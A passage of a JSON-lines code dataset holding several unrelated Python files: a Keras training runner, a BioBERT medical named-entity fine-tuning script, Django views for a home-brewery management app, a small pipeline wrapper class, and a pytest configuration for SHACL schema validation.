main()\n","sub_path":"tcpConnect.py","file_name":"tcpConnect.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"717877","text":"import datetime\nfrom pathlib import Path\nfrom gooey import Gooey, GooeyParser\n\nfrom .model import KerasAppBaseModel\nfrom .build import build\nfrom .train import TrainConfig, train_config_parser, train # , train_config\nfrom .test import TestConfig, test_config_parser, test\nfrom .generator import generator\n\nfrom keras import backend as K\n\n# from . import (train_config,\n# build,\n# build_config,\n# train,\n# config\n# test, test_config,\n# generator, generator_config,\n# )\n\n\ndef run_parser(\n parser: GooeyParser = GooeyParser(),\n title=\"Run Setting\",\n train_config=TrainConfig(),\n train_configs={},\n test_config=TestConfig(),\n test_configs={},\n ) -> GooeyParser:\n\n subs = parser.add_subparsers()\n\n test_parser = subs.add_parser('test')\n test_config_parser(test_parser, test_config=test_config)\n\n for k, v in train_configs.items():\n train_parser = subs.add_parser(k)\n train_config_parser(train_parser, train_config=v)\n\n train_parser = subs.add_parser('train')\n train_config_parser(train_parser, train_config=train_config)\n\n return parser\n\n\n# Should be fixed. It is directly used in gui/frame.py\ndef run(model: KerasAppBaseModel, config, train_config: TrainConfig = TrainConfig()):\n (build_cmds, build_args,\n run_cmds, run_args,\n generator_cmds, generator_args,\n stream) = config\n run_cmd = run_cmds[0]\n\n # model = build.build(build_args)\n # model.build(build_args)\n stream.put(('Building...', None, None))\n build(model, build_args)\n\n stream.put(('Loading...', None, None))\n if run_args.load_pretrained_weights or run_args.load_pretrained_file:\n if run_args.load_pretrained_weights == \"imagenet\":\n # Start from ImageNet trained weights\n weights_path = model.get_imagenet_weights()\n elif run_args.load_pretrained_weights == \"last\":\n # Find last trained weights\n weights_path = model.find_last()\n else:\n weights_path = run_args.load_pretrained_file\n\n model.load_weights(weights_path, by_name=True)\n\n stream.put(('Generating...', None, None))\n generator_cmd = generator_cmds[0]\n\n train_generator, val_generator = generator(generator_cmd, generator_args)\n\n if 'train' in run_cmd:\n stream.put(('Training', None, None))\n train_args = run_args\n train_config.update(train_args)\n # model.train(train_args, train_generator, val_generator)\n train(model, train_config, train_generator, val_generator, stream)\n elif 'test' == run_cmd:\n stream.put(('Testing', None, None))\n test_args = run_args\n test_generator = val_generator\n\n test(model, test_args, test_generator, stream)\n K.clear_session()\n","sub_path":"model/keras_applications/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"253166894","text":"#/usr/bin/env python\n# for.py\nimport os\n\nskipfolders = ['chap8', 'chap10']\n\nfor foldername, subfolders, filenames in os.walk(\"C:\\\\Users\\\\danie\\\\OneDrive\\\\Documents\\\\Python\\\\automate_boring_stuff\"):\n for subfolder in subfolders:\n if subfolder in skipfolders:\n continue\n print(subfolder)","sub_path":"Automate_The_Boring_Stuff/chap9/for.py","file_name":"for.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"648830630","text":"# Implementation via huggingface transformers\r\n# setup 2\r\n\r\nimport json\r\nimport numpy as np\r\nfrom seqeval.metrics import f1_score, classification_report\r\nfrom seqeval.metrics.v1 import precision_recall_fscore_support\r\nfrom seqeval.scheme import BILOU\r\nimport datetime as dt\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn import model_selection\r\nfrom transformers import DistilBertTokenizerFast, DistilBertTokenizer, DistilBertForTokenClassification, Trainer, TrainingArguments, BertTokenizerFast, BertForTokenClassification, AutoTokenizer, AutoModelForTokenClassification, AutoModel\r\nimport torch\r\nfrom sklearn.preprocessing import MultiLabelBinarizer\r\nimport time\r\nimport os\r\nfrom datasets import load_dataset, load_metric\r\nfrom typing import Dict\r\n\r\n# load data texts and labels\r\nfor line in open('data/texts.json', 'r'):\r\n texts = json.loads(line)\r\nfor line in open('data/tags.json', 'r'):\r\n tags = json.loads(line)\r\n\r\n\r\ndef encode_tags2(tags, encodings):\r\n labels = [[tag2id[tag] for tag in doc] for doc in tags]\r\n encoded_labels = []\r\n for doc_labels, doc_offset, doc_input_ids in zip(labels, encodings.offset_mapping, encodings.input_ids):\r\n # create an empty array of -100\r\n doc_enc_labels = np.ones(len(doc_offset),dtype=int) * -100\r\n arr_offset = np.array(doc_offset)\r\n\r\n # set labels whose first offset position is 0 and the second is not 0\r\n doc_enc_labels[(arr_offset[:,0] == 0) & (arr_offset[:,1] != 0)] = doc_labels\r\n \r\n #labelling the special tokens CLS and SEP:\r\n doc_enc_labels[0] = tag2id['O']\r\n last_index = doc_input_ids.index(102)\r\n doc_enc_labels[last_index] = tag2id['O']\r\n \r\n # adjusting label positions to the created subtokens\r\n for i in range(last_index):\r\n if doc_enc_labels[i] == -100:\r\n if 'B-' in id2tag[doc_enc_labels[i-1]]:\r\n doc_enc_labels[i] = tag2id[id2tag[doc_enc_labels[i-1]].replace('B-','I-')]\r\n elif 'L-' in id2tag[doc_enc_labels[i-1]]:\r\n doc_enc_labels[i-1] = tag2id[id2tag[doc_enc_labels[i-1]].replace('L-','I-')]\r\n doc_enc_labels[i] = tag2id[id2tag[doc_enc_labels[i-1]].replace('I-','L-')]\r\n elif 'U-' in id2tag[doc_enc_labels[i-1]]:\r\n doc_enc_labels[i-1] = tag2id[id2tag[doc_enc_labels[i-1]].replace('U-','B-')]\r\n doc_enc_labels[i] = tag2id[id2tag[doc_enc_labels[i-1]].replace('B-','L-')]\r\n else:\r\n doc_enc_labels[i] = tag2id[id2tag[doc_enc_labels[i-1]]]\r\n encoded_labels.append(doc_enc_labels.tolist())\r\n\r\n return encoded_labels \r\n\r\nclass NERDataset(torch.utils.data.Dataset):\r\n def __init__(self, encodings, labels):\r\n self.encodings = encodings\r\n self.labels = labels\r\n\r\n def __getitem__(self, idx):\r\n item = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}\r\n item['labels'] = torch.tensor(self.labels[idx])\r\n return item\r\n\r\n def __len__(self):\r\n return len(self.labels)\r\n \r\ndef compute_metrics(pred):\r\n labels = pred.label_ids\r\n preds = pred.predictions.argmax(-1)\r\n p = [[id2tag[p] for p in pre] for pre in preds]\r\n id2tag[-100] = '-100'# requires to be fixed!\r\n l = [[id2tag[p] for p in pre] for pre in labels]\r\n \r\n r = []\r\n for i in range(len(l)):\r\n for j in range(len(l[i])):\r\n if l[i][j] == '-100':\r\n r.append((i,j))\r\n r.reverse()\r\n for (i,j) in r:\r\n del p[i][j]\r\n del l[i][j]\r\n \r\n result = classification_report(y_true=l, y_pred=p, scheme=BILOU, mode='strict')\r\n print(result)\r\n precision, recall, f1, _ = precision_recall_fscore_support(y_true=l, y_pred=p, average=\"weighted\", scheme=BILOU)\r\n \r\n return {\r\n 'precision': precision,\r\n 'recall': recall,\r\n 'f1': f1,}\r\n \r\ndef model_init():\r\n return BertForTokenClassification.from_pretrained(\"bert-base-cased\", num_labels=len(unique_tags), return_dict=True)\r\n\r\ndef fix_tag_problems(tags, texts):\r\n # removes sentences with overlapping entities\r\n # should only occur due to problems within the data\r\n rem = []\r\n for i in range(len(tags)):\r\n for j in range(len(tags[i])):\r\n if tags[i][j]=='-':\r\n rem.append(i)\r\n rem.reverse()\r\n for obj in rem:\r\n del tags[obj]\r\n del texts[obj]\r\n return tags\r\n \r\n\r\n# main:\r\n \r\ntags = fix_tag_problems(tags, texts) \r\n\r\n# 80/20 train-test split of the data\r\ntrain_texts, val_texts, train_tags, val_tags = train_test_split(texts, tags, test_size=.2, random_state = 51)\r\n \r\n# integer representation of the labels with positional tagging\r\nunique_tags = set(tag for doc in tags for tag in doc)\r\ntag2id = {'B-NEG_FINDINGS': 0,\r\n 'I-FAMILY': 1,\r\n 'B-ETHNICITY': 2,\r\n 'L-FAMILY': 3,\r\n 'U-MEDICATION': 4,\r\n 'B-SYMPTOMS': 5,\r\n 'U-DIAGNOSIS': 6,\r\n 'L-GENDER': 7,\r\n 'O': 8,\r\n 'I-GENETICS': 9,\r\n 'I-GENDER': 10,\r\n 'B-MEDICATION': 11,\r\n 'I-BIOCHEMICAL': 12,\r\n 'I-NEG_FINDINGS': 13,\r\n 'B-PARACLINICAL': 14,\r\n 'B-BIOCHEMICAL': 15,\r\n 'B-GENDER': 16,\r\n 'B-DIAGNOSIS': 17,\r\n 'L-AGE': 18,\r\n 'L-PARACLINICAL': 19,\r\n 'U-ETHNICITY': 20,\r\n 'L-SYMPTOMS': 21,\r\n 'L-ETHNICITY': 22,\r\n 'I-DIAGNOSIS': 23,\r\n 'I-AGE': 24,\r\n 'U-PARACLINICAL': 25,\r\n 'U-BIOCHEMICAL': 26,\r\n 'B-GENETICS': 27,\r\n 'U-FAMILY': 28,\r\n 'I-ETHNICITY': 29,\r\n 'L-GENETICS': 30,\r\n 'U-NEG_FINDINGS': 31,\r\n 'B-AGE': 32,\r\n 'I-SYMPTOMS': 33,\r\n 'U-GENETICS': 34,\r\n 'B-FAMILY': 35,\r\n 'L-BIOCHEMICAL': 36,\r\n 'U-GENDER': 37,\r\n 'L-DIAGNOSIS': 38,\r\n 'L-MEDICATION': 39,\r\n 'I-PARACLINICAL': 40,\r\n 'L-NEG_FINDINGS': 41,\r\n 'U-AGE': 42,\r\n 'U-SYMPTOMS': 43,\r\n 'I-MEDICATION': 44}\r\nid2tag = {id: tag for tag, id in tag2id.items()}\r\n\r\n# encoding the data\r\ntokenizer = AutoTokenizer.from_pretrained('dmis-lab/biobert-v1.1')\r\ntrain_encodings = tokenizer(train_texts, is_split_into_words=True, return_offsets_mapping=True, padding=True, truncation=True)\r\nval_encodings = tokenizer(val_texts, is_split_into_words=True, return_offsets_mapping=True, padding=True, truncation=True)\r\n\r\n# matching the tags to the corresponding subtokens\r\ntrain_labels = encode_tags2(train_tags, train_encodings)\r\nval_labels = encode_tags2(val_tags, val_encodings)\r\n\r\n# removes the offset mappings and defines the training dataset and the validation dataset\r\ntrain_encodings.pop(\"offset_mapping\")\r\nval_encodings.pop(\"offset_mapping\")\r\ntrain_dataset = NERDataset(train_encodings, train_labels)\r\nval_dataset = NERDataset(val_encodings, val_labels)\r\n\r\n\r\n# BERT + Fine Tuning\r\n\r\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"3\"\r\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\r\n# training BioBERT v1.1 (BERT_BASE initially)\r\nmodel = AutoModelForTokenClassification.from_pretrained('dmis-lab/biobert-v1.1', num_labels=len(unique_tags))\r\n# using the current model\r\n#model = AutoModelForTokenClassification.from_pretrained('./cur_model')\r\n\r\nmodel.to(device)\r\n\r\ntraining_args = TrainingArguments(\r\n output_dir='./results', # output directory\r\n num_train_epochs=10, # total number of training epochs\r\n per_device_train_batch_size=16, # batch size per device during training\r\n per_device_eval_batch_size=64, # batch size for evaluation\r\n warmup_steps=169, # number of warmup steps for learning rate scheduler\r\n weight_decay=0.0042, # strength of weight decay\r\n logging_dir='./logs', # directory for storing logs\r\n logging_steps=100,\r\n evaluation_strategy=\"epoch\",\r\n overwrite_output_dir = True,\r\n save_total_limit = 5,\r\n save_steps = 500,\r\n learning_rate=6.917e-05,\r\n )\r\n\r\ntrainer = Trainer(\r\n model=model, # the instantiated 🤗 Transformers model to be trained\r\n args=training_args, # training arguments, defined above\r\n train_dataset=train_dataset, # training dataset\r\n eval_dataset=val_dataset, # evaluation dataset\r\n compute_metrics=compute_metrics,\r\n)\r\n\r\n# hyperparameter tuning\r\n'''\r\ndef hp_space_optuna(trial) -> Dict[str, float]:\r\n from transformers.integrations import is_optuna_available\r\n\r\n assert is_optuna_available(), \"This function needs Optuna installed: `pip install optuna`\"\r\n return {\r\n \"learning_rate\": trial.suggest_float(\"learning_rate\", 1e-6, 1e-3, log=True),\r\n \"num_train_epochs\": trial.suggest_int(\"num_train_epochs\", 3, 10),\r\n \"seed\": trial.suggest_int(\"seed\", 1, 40),\r\n \"per_device_train_batch_size\": trial.suggest_categorical(\"per_device_train_batch_size\", [4, 8, 16, 32]),\r\n \"weight_decay\": trial.suggest_float(\"weight_decay\", 0.0001, 1, log=True),\r\n \"warmup_steps\": trial.suggest_int(\"warmup_steps\", 1, 1000),\r\n }\r\n\r\nbest_trials = trainer.hyperparameter_search(\r\n direction=\"maximize\", \r\n backend=\"optuna\",\r\n n_trials = 300,\r\n hp_space = hp_space_optuna\r\n)\r\n \r\nprint(best_trials)\r\n'''\r\nprint(\"Training start: \")\r\nprint(dt.datetime.now())\r\nt1 = time.time()\r\ntrainer.train()\r\nresult = trainer.evaluate()\r\nprint(result)\r\nprint(\"Time taken: \"+str((time.time()-t1)/60)+\" min\")\r\n# saving the model\r\n#trainer.save_model(output_dir='./cur_model')\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"232074168","text":"from django.shortcuts import render, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom datetime import datetime\n#from influxdb import InfluxDBClient\n#import plotly.graph_objects as go\n#from plotly.offline import plot\n#from plotly.subplots import make_subplots\n\nimport base64\nfrom math import pow\nfrom os import environ\n\nfrom .models import Recipe, Step, Charge, RecipeProtocol, Keg, Hint, FermentationProtocol\nfrom .forms import *\n\n# Used for recipe scaling\nAMOUNT_FACTOR = 100\n\ndef index(request):\n return render(request, 'brewery/index.html')\n\n\ndef protocol_step(charge, step, starttime):\n c = charge\n s = step\n tstart = starttime\n pstep = RecipeProtocol()\n pstep.charge = Charge.objects.get(id=c.id)\n pstep.step = s.id\n pstep.title = s.title\n pstep.description = s.description\n pstep.duration = s.duration\n pstep.ingredient = s.ingredient\n pstep.amount = (s.amount * c.amount) / AMOUNT_FACTOR if s.amount else s.amount\n pstep.tstart = tstart\n pstep.tend = datetime.now()\n return pstep\n\n\ndef storage_delta(charge, step):\n required = charge.amount * step.amount / AMOUNT_FACTOR\n available = Storage.objects.get(name=step.ingredient).amount\n delta = available - required\n return delta\n\n\n@login_required\ndef brewing_overview(request):\n c = Charge.objects.filter(finished=True)\n active = Charge.objects.filter(finished=False)\n context = {\n 'charge': c,\n 'active': active\n }\n return render(request, 'brewery/brewing_overview.html', context)\n\n\n@login_required\ndef brewing(request, cid):\n c = get_object_or_404(Charge, pk=cid)\n preps = PreparationProtocol.objects.filter(charge=c)\n context = {}\n # Charge complete\n if c.finished:\n return HttpResponseRedirect(reverse('protocol', kwargs={'cid': c.id}))\n # Fermentation: Starting point\n elif c.preps_finished and c.brewing_finished:\n return HttpResponseRedirect(reverse('fermentation', kwargs={'cid': c.id}))\n # Brewing: Restore session\n elif c.preps_finished and not request.POST:\n step = c.current_step\n step.amount = (step.amount * c.amount) / AMOUNT_FACTOR if step.amount else step.amount\n context['charge'] = c\n context['tstart'] = datetime.now()\n context['step'] = step\n context['hint'] = Hint.objects.filter(step__id=step.id)\n context['protocol'] = RecipeProtocol.objects.filter(charge=cid)\n context['form'] = BrewingProtocol()\n\n return render(request, 'brewery/brewing.html', context)\n # Brewing: Start process if not already finished\n else:\n # Preparations: save current result\n if request.POST.get('preps_save'):\n preps_form = [PreparationProtocolForm(request.POST, prefix=str(item), instance=item) for item in preps]\n for pf in preps_form:\n if pf.is_valid():\n pf.save()\n return HttpResponseRedirect(reverse('brewing_overview'))\n\n # Preparations: if finished, continue brewing\n if request.POST.get('preps_next'):\n preps_form = [PreparationProtocolForm(request.POST, prefix=str(item), instance=item) for item in preps]\n for pf in preps_form:\n if pf.is_valid():\n pf.save()\n # Check for finished preps\n finished = not(preps.filter(check=False).exists())\n context = {'charge': c, 'list': zip(preps, preps_form)}\n if finished:\n c.preps_finished = True\n c.save()\n step = Step.objects.get(pk=c.recipe.first)\n step.amount = (step.amount * c.amount) / AMOUNT_FACTOR if step.amount else step.amount\n context['step'] = step\n context['tstart'] = datetime.now()\n context['hint'] = Hint.objects.filter(step__id=step.id)\n context['form'] = BrewingProtocol()\n return render(request, 'brewery/brewing.html', context)\n else:\n return render(request, 'brewery/brewing.html', context)\n\n # Brewing: get next step\n if request.POST.get('brew_next'):\n cid = request.POST.get('charge')\n c = Charge.objects.get(pk=cid)\n pform = BrewingProtocol(request.POST)\n step = c.current_step\n print(\"Get next: {}\".format(step))\n tstart = datetime.strptime(request.POST.get('tstart')[:-1], \"%Y%m%d%H%M%S%f\")\n if pform.is_valid():\n # Create step of protocol\n pstep = protocol_step(c, step, tstart)\n pstep.comment = pform.cleaned_data['comment']\n pstep.save()\n # Update storage\n if step.amount:\n item = Storage.objects.get(name=step.ingredient)\n item.amount = storage_delta(c, step)\n item.save() \n try:\n print(\"TRY: {}\".format(step.next))\n step = step.next\n step.amount = (step.amount * c.amount) / AMOUNT_FACTOR if step.amount else step.amount\n context['charge'] = c\n context['tstart'] = datetime.now()\n context['step'] = step\n context['hint'] = Hint.objects.filter(step__id=step.id)\n context['protocol'] = RecipeProtocol.objects.filter(charge=cid)\n context['form'] = BrewingProtocol()\n c.current_step = step\n c.save()\n return render(request, 'brewery/brewing.html', context)\n except:\n # Calculate overall duration time\n c.duration = datetime.now() - c.production.replace(tzinfo=None)\n c.brewing_finished = True\n c.save()\n context['charge'] = c\n context['protocol'] = RecipeProtocol.objects.filter(charge=cid)\n return HttpResponseRedirect(reverse('fermentation', kwargs={'cid': c.id}))\n else:\n print(\"pform not valid\")\n # Preparations: start preparations\n else:\n preps_form = [PreparationProtocolForm(prefix=str(item), instance=item) for item in preps]\n zipped_list = zip(preps, preps_form)\n for s in Step.objects.filter(recipe=c.recipe):\n if s.amount:\n delta = storage_delta(c, s)\n context = {'charge': c, 'list': zipped_list}\n return render(request, 'brewery/brewing.html', context)\n\n@login_required\ndef brewing_add(request):\n if request.method == 'POST':\n charge_form = BrewingCharge(request.POST)\n protocol_form = BrewingProtocol(request.POST)\n if request.POST.get('create'):\n if charge_form.is_valid():\n # Create charge\n c = Charge()\n # Calculate charge ID\n current_year = datetime.now().strftime(\"%Y\")\n yearly_production = Charge.objects.filter(production__contains=current_year + \"-\").count() + 1\n current_year_month = datetime.now().strftime(\"%Y%m\")\n # Create new charge\n c.cid = current_year_month + \".\" + str(yearly_production)\n c.recipe = charge_form.cleaned_data['recipe']\n c.amount = charge_form.cleaned_data['amount']\n c.brewmaster = charge_form.cleaned_data['brewmaster']\n c.production = datetime.now()\n c.current_step = Step.objects.get(pk=c.recipe.first)\n c.save()\n\n # Create required preparations\n preps = Preparation.objects.filter(recipe__id=c.recipe.id)\n for p in preps:\n preps_protocol = PreparationProtocol()\n preps_protocol.charge = c\n preps_protocol.preparation = p\n preps_protocol.check = False\n preps_protocol.save()\n\n context = {\n 'charge': c,\n 'form': protocol_form,\n 'next': True,\n }\n return HttpResponseRedirect(reverse('brewing', kwargs={'cid': c.id}))\n\n \n else:\n charge_form = BrewingCharge()\n context = {'form': charge_form}\n return render(request, 'brewery/brewing.html', context)\n\n\n@login_required\ndef protocol(request, cid):\n c = Charge.objects.get(pk=cid)\n p = RecipeProtocol.objects.filter(charge=c.id)\n d = c.duration\n context = {'protocol': p, 'charge': c, 'duration': d}\n\n return render(request, 'brewery/protocol.html', context)\n\n\n@login_required\ndef fermentation(request, cid):\n c = Charge.objects.get(pk=cid)\n f = FermentationProtocol.objects.filter(charge=c)\n context = {}\n context['charge'] = c\n context['fermentation'] = f\n context['form'] = FermentationProtocolForm()\n if request.POST:\n if request.POST.get('spindel') == \"True\":\n c.ispindel = True\n c.save()\n return render(request, 'brewery/fermentation.html', context)\n if request.POST.get('save'):\n form = FermentationProtocolForm(request.POST)\n if form.is_valid():\n form = form.save(commit=False)\n form.charge = c\n form.save()\n context['form'] = FermentationProtocolForm()\n context['fermentation'] = FermentationProtocol.objects.filter(charge=c)\n if request.POST.get('finished'):\n c.finished = True\n c.save()\n return HttpResponseRedirect(reverse('brewing_overview'))\n return render(request, 'brewery/fermentation.html', context)\n else:\n if not c.fermentation:\n c.fermentation = True\n c.save()\n return render(request, 'brewery/fermentation.html', context)\n else:\n return render(request, 'brewery/fermentation.html', context)\n\n@login_required\ndef spindel(request):\n \"\"\"\"\n client = InfluxDBClient(host='braurat.de', port=8086, username='admin', password=environ['INFLUXDB_PASS'])\n client.switch_database('ispindel')\n q = client.query('SELECT \"tilt\",\"temperature\", \"battery\" FROM \"measurements\"')\n # ['time', 'RSSI', 'battery', 'gravity', 'interval', 'source', 'temp_units', 'temperature', 'tilt'],\n time = []\n tilt = []\n temperature = []\n battery = []\n points = q.get_points()\n for item in points:\n time.append(item['time'])\n # Ploynom: 0.000166916x^3 + -0.01470147x^2 + 0.679876283x + -10.536229152\n x = item['tilt']\n plato = (0.000166916 * pow(x, 3))\n plato = plato - (0.01470147 * pow(x, 2))\n plato = plato + (0.679876283 * x)\n plato = plato - 10.536229152\n tilt.append(plato)\n\n temperature.append(item['temperature'])\n battery.append(item['battery'])\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n fig.update_layout(\n title=\"iSpindel\",\n xaxis_title=\"Zeit\",\n yaxis_title=\"Vergärungsgrad\",\n yaxis_range=[-10, 40],\n yaxis2=dict(\n title=\"Grad Celius\",\n overlaying='y',\n side='right',\n range=[2, 30]\n ),\n legend_title=\"Legende\",\n font=dict(\n family=\"Courier New, monospace\",\n size=18,\n color=\"RebeccaPurple\"\n )\n )\n fig.add_trace(go.Scatter(x=time, y=tilt,\n line_shape='spline',\n mode='lines',\n name='Plato'),\n secondary_y=False)\n fig.add_trace(go.Scatter(x=time, y=temperature,\n line_shape='spline',\n mode='lines',\n name='Temepratur'),\n secondary_y=True)\n fig.add_trace(go.Scatter(x=time, y=battery,\n line_shape='spline',\n mode='lines',\n name='Batterie'))\n\n plt_div = plot(fig, output_type='div')\n client.close()\n\n print(len(time))\n\n return render(request, 'brewery/spindel.html', {'plot': plt_div})\n \"\"\"\n plt_div = None\n return render(request, 'brewery/spindel.html', {'plot': plt_div})\n\n\n@login_required\ndef recipe(request):\n r = Recipe.objects.all()\n context = {'recipes': r}\n return render(request, 'brewery/recipe.html', context)\n\n### HELPER FUNCTION\ndef get_steps(recipe):\n try:\n step = Step.objects.get(pk=recipe.first)\n except:\n step = None\n s = []\n while step:\n s.append(step)\n try:\n step = step.next\n except:\n step = None\n return s\n\n\n@login_required\ndef recipe_detail(request, recipe_id):\n r = Recipe.objects.get(pk=recipe_id)\n s = get_steps(r) \n p = Preparation.objects.filter(recipe=r)\n\n if request.method == 'POST':\n if request.POST.get('delete'):\n r.delete()\n return HttpResponseRedirect(reverse('recipe'))\n\n context = {'recipe': r, 'steps': s, 'preparation': p}\n\n return render(request, 'brewery/recipe_detail.html', context)\n\n\n@login_required\ndef recipe_add(request):\n if request.method == 'POST':\n add_recipe = AddRecipe(request.POST)\n select_preparation = SelectPreparation(request.POST)\n if add_recipe.is_valid():\n ar = add_recipe.save(commit=False)\n ar.author = request.user\n ar.creation = datetime.now()\n ar.save()\n if select_preparation.is_valid():\n for item in select_preparation.cleaned_data['preparation']:\n prep = get_object_or_404(Preparation, short=item)\n prep.recipe.add(ar)\n return HttpResponseRedirect(reverse('recipe_edit', kwargs={'recipe_id': ar.id}))\n\n add_recipe = AddRecipe()\n select_preparation = SelectPreparation()\n context = {'add_recipe': add_recipe, 'select_preparation': select_preparation}\n\n return render(request, 'brewery/recipe_add.html', context)\n\n\n@login_required\ndef recipe_edit(request, recipe_id):\n r = Recipe.objects.get(pk=recipe_id)\n s = get_steps(r)\n preps = SelectPreparation()\n\n # Get steps which are not properly linked\n unused_steps = Step.objects.filter(recipe=r)\n try:\n used_steps = Step.objects.get(pk=r.first)\n except:\n used_steps = None\n\n while used_steps:\n unused_steps = unused_steps.exclude(pk=used_steps.id)\n try:\n used_steps = used_steps.next\n except:\n used_steps = None\n \n if request.method == 'POST':\n if request.POST.get('add'):\n return HttpResponseRedirect(reverse('step_add', kwargs={'recipe_id': r.id}))\n\n form = EditRecipe()\n context = {'form': form, 'steps': s, 'recipe': r, 'unused': unused_steps, 'preps': preps}\n\n return render(request, 'brewery/recipe_edit.html', context)\n\n\ndef step_edit(request, recipe_id, step_id=None):\n r = Recipe.objects.get(pk=recipe_id)\n if step_id is None:\n form = StepForm()\n else:\n s = Step.objects.filter(recipe=recipe_id).get(pk=step_id)\n form = StepForm(instance=s)\n if request.method == 'POST':\n if step_id is None:\n form = StepForm(request.POST)\n else:\n form = StepForm(request.POST, instance=s)\n # Update linked list\n try:\n prev = Step.objects.get(pk=form.data['prev'])\n except:\n prev = None\n try:\n old_next = prev.next\n old_next.prev = None\n old_next.save()\n except:\n old_next = None\n\n if form.is_valid():\n step = form.save(commit=False)\n step.recipe = r\n step.save()\n # Update linked list\n if old_next:\n old_next.prev = step\n old_next.save()\n if not prev:\n r.first = step.id\n r.save()\n return HttpResponseRedirect(reverse('recipe_edit', kwargs={'recipe_id': r.id}))\n else:\n print(dict(form.errors))\n return HttpResponseRedirect(reverse('recipe_edit', kwargs={'recipe_id': r.id}))\n # Filter choosable steps for specified recipe\n form.fields[\"prev\"].queryset = Step.objects.filter(recipe=recipe_id)\n\n context = {'form': form, 'recipe': r}\n return render(request, 'brewery/step_edit.html', context)\n\n\n@login_required\ndef storage(request):\n items = Storage.objects.all()\n context = {'storage': items}\n return render(request, 'brewery/storage.html', context)\n\n\n@login_required\ndef storage_add(request):\n form = StorageAddItem(request.POST)\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('storage'))\n\n context = {'storage': storage, 'form': form}\n return render(request, 'brewery/storage_add.html', context)\n\n\n@login_required\ndef storage_edit(request, s_id):\n item = Storage.objects.get(pk=s_id)\n form = StorageAddItem(instance=item)\n if request.method == 'POST':\n form = StorageAddItem(request.POST, instance=item)\n if form.is_valid():\n if request.POST.get('save'):\n form.save()\n return HttpResponseRedirect(reverse('storage'))\n if request.POST.get('delete'):\n item.delete()\n return HttpResponseRedirect(reverse('storage'))\n context = {'form': form}\n return render(request, 'brewery/storage_edit.html', context)\n\n\n@login_required\ndef keg(request):\n kegs = Keg.objects.all()\n if request.method == 'POST':\n print(\"request.POST: %s\" % request.POST)\n if request.POST.get('edit'):\n keg_forms = [EditKegContent(prefix=str(k), instance=k) for k in kegs]\n zipped_list = zip(kegs, keg_forms)\n context = {'list': zipped_list}\n return render(request, 'brewery/keg.html', context)\n if request.POST.get('save'):\n keg_forms = [EditKegContent(request.POST, prefix=str(k), instance=k) for k in kegs]\n for kf in keg_forms:\n if kf.is_valid():\n kf.save()\n\n return HttpResponseRedirect(reverse('keg'))\n else:\n context = {'kegs': kegs}\n return render(request, 'brewery/keg.html', context)","sub_path":"brewery/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"257919525","text":"from .imodule import IModule\nfrom .structures import FrameData\n\n\nclass FrameDataModule(IModule):\n \"\"\"\n Check that incoming and outcoming data is FrameData.\n Specific for FrameData Pipelines\n \"\"\"\n\n def __init__(self, module):\n \"\"\"\n Args:\n module: IModule\n \"\"\"\n super(FrameDataModule, self).__init__()\n\n self.module = module\n\n def process(self, data, **kwargs):\n \"\"\"\n Args:\n data: structures.FrameData\n\n Returns:\n result: structures.FrameData\n \"\"\"\n\n assert isinstance(data, FrameData), \"Invalid type. {} != {}\".format(\n type(data), FrameData.__class__.__name__)\n\n result = self.module.process(data, **kwargs)\n\n assert isinstance(result, FrameData), \"Invalid type. {} != {}\".format(\n type(result), FrameData.__class__.__name__)\n\n return result\n","sub_path":"src/base/frame_data_module.py","file_name":"frame_data_module.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"407773251","text":"import os, sys\nimport pytest\nimport logging\nimport glob\nfrom .shaclvalidator import get_graph\n\nlogger = logging.getLogger(__name__)\n\nPATH = os.getcwd()\npytest.SHACL_SHACL = os.path.join(PATH, 'tests', 'shacl-schema.ttl')\n\nif not os.path.exists(pytest.SHACL_SHACL):\n logger.error(f'{pytest.SHACL_SHACL} not found')\n sys.exit()\n\n\n@pytest.fixture(scope='session')\ndef shacl_schema():\n logger.info(\"loading SHACL of SHACL schema\")\n return get_graph(pytest.SHACL_SHACL)\n\n\ndef pytest_addoption(parser):\n default_scan_dir = os.path.join(PATH, '..', 'neuroshapes', 'shapes')\n parser.addoption(\"--scan_dir\", action=\"store\", default=default_scan_dir)\n\n\ndef pytest_generate_tests(metafunc):\n\n # perform schemas validation\n scan_dir = metafunc.config.option.scan_dir\n logger.info(f'scanning {scan_dir}')\n\n schema_files = [f for f in glob.iglob(scan_dir + '/**/schema.json', recursive=True)]\n\n datashape_files = [f.replace('schema.json', os.path.join('examples', 'datashapes.json')) for f in schema_files]\n datashape_files = list(filter(lambda f: os.path.exists(f), datashape_files))\n shapes_files = schema_files + datashape_files\n\n if \"schema_file\" in metafunc.fixturenames:\n metafunc.parametrize(\"schema_file\", shapes_files)\n\n tests_payload = []\n for sh in schema_files:\n\n subdir = sh.replace(os.sep + 'schema.json', '')\n\n if not os.path.exists(os.sep.join([subdir, 'examples'])):\n continue\n\n shape_file = sh\n datashape_example = os.sep.join([subdir, 'examples', 'datashapes.json'])\n if os.path.exists(datashape_example):\n shape_file = datashape_example\n\n valid_dir = os.sep.join([subdir, 'examples', 'valid']) + os.sep\n if os.path.exists(valid_dir):\n for f in glob.glob(valid_dir + '*.json'):\n tests_payload.append((shape_file, f, 